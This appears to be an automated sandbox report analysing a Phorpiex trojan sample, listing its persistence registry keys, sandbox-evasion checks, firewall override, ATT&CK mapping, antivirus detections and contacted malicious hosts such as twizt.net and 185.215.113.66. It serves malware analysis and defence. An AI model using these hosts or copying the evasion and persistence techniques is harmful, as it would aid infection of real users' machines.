Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Settings	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Settings	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Changes the view of files in windows explorer (hidden files and folders)

Source: C:\Users\user\AppData\Local\Temp\135143440.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\957C4XK6Lt.exe	File opened: C:\Users\user\AppData\Local\Temp\135143440.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	File opened: C:\Users\user\AppData\Local\Temp\135143440.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	File opened: C:\Users\user\AppData\Local\Temp\1682018248.exe:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Users\user\Desktop\957C4XK6Lt.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Code function: 3_2_0040CF30	3_2_0040CF30
Source: C:\Users\user\sysvratrel.exe	Code function: 5_2_0040CF30	5_2_0040CF30
Source: C:\Users\user\sysvratrel.exe	Code function: 8_2_0040CF30	8_2_0040CF30

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess	graph_3-4354
Source: C:\Users\user\sysvratrel.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep	graph_5-4353
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep	graph_3-4354
Source: C:\Users\user\sysvratrel.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess	graph_5-4353

Source: C:\Users\user\AppData\Local\Temp\135143440.exe

Window / User API: threadDelayed 6250

Jump to behavior

Source: C:\Users\user\sysvratrel.exe	Evaded block: after key decision			graph_5-4353
Source: C:\Users\user\sysvratrel.exe	Evaded block: after key decision			graph_8-4353

Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Evasive API call chain: RegQueryValue,DecisionNodes,Sleep	graph_3-5742
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_3-4383
Source: C:\Users\user\sysvratrel.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_5-4372
Source: C:\Users\user\sysvratrel.exe	Evasive API call chain: RegQueryValue,DecisionNodes,Sleep	graph_5-5281

Source: C:\Users\user\sysvratrel.exe	API coverage: 0.9 %
Source: C:\Users\user\sysvratrel.exe	API coverage: 0.9 %

Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Code function: 3_2_0040CF30		3_2_0040CF30
Source: C:\Users\user\sysvratrel.exe	Code function: 8_2_0040CF30		8_2_0040CF30

Source: C:\Users\user\AppData\Local\Temp\135143440.exe TID: 2304	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe TID: 6756	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe TID: 6756	Thread sleep count: 6250 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe TID: 6756	Thread sleep time: -12500000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Code function: 3_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	3_2_00406650
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Code function: 3_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	3_2_00406510
Source: C:\Users\user\sysvratrel.exe	Code function: 5_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	5_2_00406650
Source: C:\Users\user\sysvratrel.exe	Code function: 5_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	5_2_00406510
Source: C:\Users\user\sysvratrel.exe	Code function: 8_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	8_2_00406650
Source: C:\Users\user\sysvratrel.exe	Code function: 8_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	8_2_00406510

Source: C:\Users\user\AppData\Local\Temp\135143440.exe

Code function: 3_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,

3_2_00402020

Source: C:\Users\user\AppData\Local\Temp\135143440.exe

Thread delayed: delay time: 30000

Jump to behavior

Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000920000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.00000000008DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWPx

Source: C:\Users\user\AppData\Local\Temp\135143440.exe	API call chain: ExitProcess graph end node	graph_3-4368
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	API call chain: ExitProcess graph end node	graph_3-4355
Source: C:\Users\user\sysvratrel.exe	API call chain: ExitProcess graph end node	graph_5-4927
Source: C:\Users\user\sysvratrel.exe	API call chain: ExitProcess graph end node	graph_5-4367
Source: C:\Users\user\sysvratrel.exe	API call chain: ExitProcess graph end node	graph_8-4927
Source: C:\Users\user\sysvratrel.exe	API call chain: ExitProcess graph end node	graph_8-4367

Source: C:\Users\user\Desktop\957C4XK6Lt.exe

Code function: 0_2_00531BC8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,

0_2_00531BC8

Source: C:\Users\user\AppData\Local\Temp\135143440.exe

Code function: 3_2_0040A120 GetProcessHeaps,

3_2_0040A120

Source: C:\Users\user\Desktop\957C4XK6Lt.exe

Code function: 0_2_00531BC8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,

0_2_00531BC8

Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Code function: GetLocaleInfoA,strcmp,	3_2_0040E970
Source: C:\Users\user\sysvratrel.exe	Code function: GetLocaleInfoA,strcmp,	5_2_0040E970
Source: C:\Users\user\sysvratrel.exe	Code function: GetLocaleInfoA,strcmp,	8_2_0040E970

Source: C:\Users\user\Desktop\957C4XK6Lt.exe

Code function: 0_2_00531AF8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00531AF8

Lowering of HIPS / PFW / Operating System Security Settings

Changes security center settings (notifications, updates, antivirus, firewall)

Source: C:\Users\user\AppData\Local\Temp\135143440.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center FirewallOverride

Jump to behavior

Remote Access Functionality

Yara detected Phorpiex

Source: Yara match	File source: 5.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.1682018248.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.1682018248.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.135143440.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.135143440.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 135143440.exe PID: 6684, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysvratrel.exe PID: 5676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1682018248.exe PID: 6528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysvratrel.exe PID: 2012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysvratrel.exe PID: 6196, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\sysvratrel.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\sysvratrel.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1682018248.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\135143440.exe, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Code function: 3_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,	3_2_00401470
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Code function: 3_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,	3_2_00402020
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Code function: 3_2_0040D950 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,	3_2_0040D950
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Code function: 3_2_004013B0 CreateEventA,socket,bind,CreateThread,	3_2_004013B0
Source: C:\Users\user\sysvratrel.exe	Code function: 5_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,	5_2_00401470
Source: C:\Users\user\sysvratrel.exe	Code function: 5_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,	5_2_00402020
Source: C:\Users\user\sysvratrel.exe	Code function: 5_2_0040D950 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,	5_2_0040D950
Source: C:\Users\user\sysvratrel.exe	Code function: 5_2_004013B0 CreateEventA,socket,bind,CreateThread,	5_2_004013B0
Source: C:\Users\user\sysvratrel.exe	Code function: 8_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,	8_2_00401470
Source: C:\Users\user\sysvratrel.exe	Code function: 8_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,	8_2_00402020
Source: C:\Users\user\sysvratrel.exe	Code function: 8_2_0040D950 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,	8_2_0040D950
Source: C:\Users\user\sysvratrel.exe	Code function: 8_2_004013B0 CreateEventA,socket,bind,CreateThread,	8_2_004013B0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 Windows Service	1 Windows Service	231 Masquerading	11 Input Capture	1 System Time Discovery	Remote Services	11 Input Capture	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Disable or Modify Tools	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	11 Virtualization/Sandbox Evasion	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	3 Clipboard Data	14 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Hidden Files and Directories	LSA Secrets	1 System Network Connections Discovery	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
957C4XK6Lt.exe	68%	ReversingLabs	Win32.Trojan.MintZard
957C4XK6Lt.exe	56%	Virustotal		Browse
957C4XK6Lt.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\135143440.exe	100%	Avira	HEUR/AGEN.1315882
C:\Users\user\sysvratrel.exe	100%	Avira	HEUR/AGEN.1315882
C:\Users\user\AppData\Local\Temp\1682018248.exe	100%	Avira	HEUR/AGEN.1315882
C:\Users\user\sysvratrel.exe	100%	Avira	HEUR/AGEN.1315882
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe	100%	Avira	HEUR/AGEN.1315882
C:\Users\user\AppData\Local\Temp\135143440.exe	100%	Joe Sandbox ML
C:\Users\user\sysvratrel.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1682018248.exe	100%	Joe Sandbox ML
C:\Users\user\sysvratrel.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe	65%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Temp\135143440.exe	65%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Temp\1682018248.exe	79%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\sysvratrel.exe	65%	ReversingLabs	Win32.Trojan.MintZard
C:\Windows\sysvratrel.exe	65%	ReversingLabs	Win32.Trojan.MintZard

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
twizt.net	22%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://91.202.233.141/	0%	Avira URL Cloud	safe
http://91.202.233.141/1	0%	Avira URL Cloud	safe
http://twizt.net/pei	100%	Avira URL Cloud	malware
http://twizt.net/new	100%	Avira URL Cloud	malware
http://185.215.113.66/1D	100%	Avira URL Cloud	malware
http://193.233.132.177/5h.dllm	0%	Avira URL Cloud	safe
http://91.202.233.141/2	0%	Avira URL Cloud	safe
http://91.202.233.141/	9%	Virustotal		Browse
http://193.233.132.177/5z	0%	Avira URL Cloud	safe
http://twizt.net/pei	14%	Virustotal		Browse
http://91.202.233.141/4l3	0%	Avira URL Cloud	safe
http://91.202.233.141/2	4%	Virustotal		Browse
http://193.233.132.177/6b	0%	Avira URL Cloud	safe
http://91.202.233.141/1	3%	Virustotal		Browse
http://twizt.net/new	14%	Virustotal		Browse
http://185.215.113.66/383(	100%	Avira URL Cloud	malware
http://193.233.132.177/3B	0%	Avira URL Cloud	safe
http://91.202.233.141/5	0%	Avira URL Cloud	safe
http://91.202.233.141/6	0%	Avira URL Cloud	safe
http://185.215.113.66/1D	18%	Virustotal		Browse
http://91.202.233.141/3	0%	Avira URL Cloud	safe
http://91.202.233.141/4	0%	Avira URL Cloud	safe
http://185.215.113.66/http://91.202.233.141/http://193.233.132.177/123456%s%s%s:Zone.Identifier%user	100%	Avira URL Cloud	malware
http://91.202.233.141/2s	0%	Avira URL Cloud	safe
http://twizt.net/peinstall.php5%z	100%	Avira URL Cloud	malware
http://91.202.233.141/5	5%	Virustotal		Browse
http://twizt.net/newtpp.z%	100%	Avira URL Cloud	malware
http://91.202.233.141/6	5%	Virustotal		Browse
http://193.233.132.177/5R	0%	Avira URL Cloud	safe
http://185.215.113.66/http://91.202.233.141/http://193.233.132.177/123456%s%s%s:Zone.Identifier%user	16%	Virustotal		Browse
http://91.202.233.141/1p3	0%	Avira URL Cloud	safe
http://91.202.233.141/3	1%	Virustotal		Browse
http://185.215.113.66/	100%	Avira URL Cloud	malware
http://91.202.233.141/4	5%	Virustotal		Browse
http://91.202.233.141/40	0%	Avira URL Cloud	safe
http://twizt.net/peinstall.phpb	100%	Avira URL Cloud	malware
http://91.202.233.141/4%	0%	Avira URL Cloud	safe
http://193.233.132.177/1Z	0%	Avira URL Cloud	safe
http://91.202.233.141/6L2	0%	Avira URL Cloud	safe
http://twizt.net/peinstall.phpshqos.dll.muiS9	100%	Avira URL Cloud	malware
http://91.20	0%	Avira URL Cloud	safe
http://twizt.net/newtpp.exeP0S	100%	Avira URL Cloud	malware
http://91.202.233.141/3rosoft	0%	Avira URL Cloud	safe
http://twizt.net/peinstall.phpb	14%	Virustotal		Browse
http://185.215.113.66/1~	100%	Avira URL Cloud	malware
http://twizt.net/peinstall.phpm%	100%	Avira URL Cloud	malware
http://193.233.132.177/	0%	Avira URL Cloud	safe
http://91.20	0%	Virustotal		Browse
http://185.215.113.66/5	100%	Avira URL Cloud	malware
http://185.215.113.66/4	100%	Avira URL Cloud	malware
http://185.215.113.66/1~	16%	Virustotal		Browse
http://185.215.113.66/	17%	Virustotal		Browse
http://185.215.113.66/3	100%	Avira URL Cloud	malware
http://185.215.113.66/2	100%	Avira URL Cloud	malware
http://193.233.132.177/6	0%	Avira URL Cloud	safe
http://91.202.233.141/2W3C	0%	Avira URL Cloud	safe
http://185.215.113.66/5	18%	Virustotal		Browse
http://193.233.132.177/5	0%	Avira URL Cloud	safe
http://185.215.113.66/4	18%	Virustotal		Browse
http://193.233.132.177/	8%	Virustotal		Browse
http://193.233.132.177/2	0%	Avira URL Cloud	safe
http://185.215.113.66/6	100%	Avira URL Cloud	malware
http://185.215.113.66/3	18%	Virustotal		Browse
http://193.233.132.177/1	0%	Avira URL Cloud	safe
http://185.215.113.66/2	18%	Virustotal		Browse
http://193.233.132.177/4	0%	Avira URL Cloud	safe
http://91.202.233.141/4z	0%	Avira URL Cloud	safe
http://193.233.132.177/3	0%	Avira URL Cloud	safe
http://185.215.113.66/1	100%	Avira URL Cloud	malware
http://twizt.net/peinstall.php%temp%%s	100%	Avira URL Cloud	malware
http://91.202.233.141/5O	0%	Avira URL Cloud	safe
http://193.233.132.177/6	1%	Virustotal		Browse
http://91.202.233.141/6ZF	0%	Avira URL Cloud	safe
http://193.233.132.177/5h.dll	0%	Avira URL Cloud	safe
http://91.202.233.141/6-3	0%	Avira URL Cloud	safe
http://twizt.net/newtpp.exeP0	100%	Avira URL Cloud	malware
http://twizt.net/peinstall.phpystem32	100%	Avira URL Cloud	malware
http://twizt.net/=	100%	Avira URL Cloud	malware
http://twizt.net/newtpp.exe	100%	Avira URL Cloud	malware
http://twizt.net/peinstall.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
twizt.net	185.215.113.66	true	false	22%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.66/5	false	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.66/4	false	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.66/3	false	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.66/2	false	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.66/6	false	Avira URL Cloud: malware	unknown
http://185.215.113.66/1	false	Avira URL Cloud: malware	unknown
http://twizt.net/newtpp.exe	false	Avira URL Cloud: malware	unknown
http://twizt.net/peinstall.php	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://twizt.net/pei	957C4XK6Lt.exe, 00000000.00000002.2175793520.00000000008BE000.00000004.00000020.00020000.00000000.sdmp	true	14%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://twizt.net/new	957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmp	true	14%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://91.202.233.141/	135143440.exe, 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, sysvratrel.exe, 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1682018248.exe, 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 1682018248.exe, 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysvratrel.exe, 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 135143440.exe.0.dr, sysvratrel.exe0.3.dr, 1682018248.exe.3.dr, sysvratrel.exe.3.dr, newtpp[1].exe.0.dr	false	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.215.113.66/1D	135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp	true	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/soap/envelope/	newtpp[1].exe.0.dr	false		high
http://91.202.233.141/1	135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://193.233.132.177/5h.dllm	135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.141/2	135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://193.233.132.177/5z	135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.141/4l3	135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://193.233.132.177/6b	135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.66/383(	135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://193.233.132.177/3B	135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.141/5	135143440.exe, 00000003.00000002.4536101356.00000000024AB000.00000004.00000010.00020000.00000000.sdmp	false	5%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://91.202.233.141/6	135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	false	5%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://91.202.233.141/3	135143440.exe, 00000003.00000002.4535794136.0000000000711000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://91.202.233.141/4	135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	false	5%, Virustotal, Browse Avira URL Cloud: safe	unknown
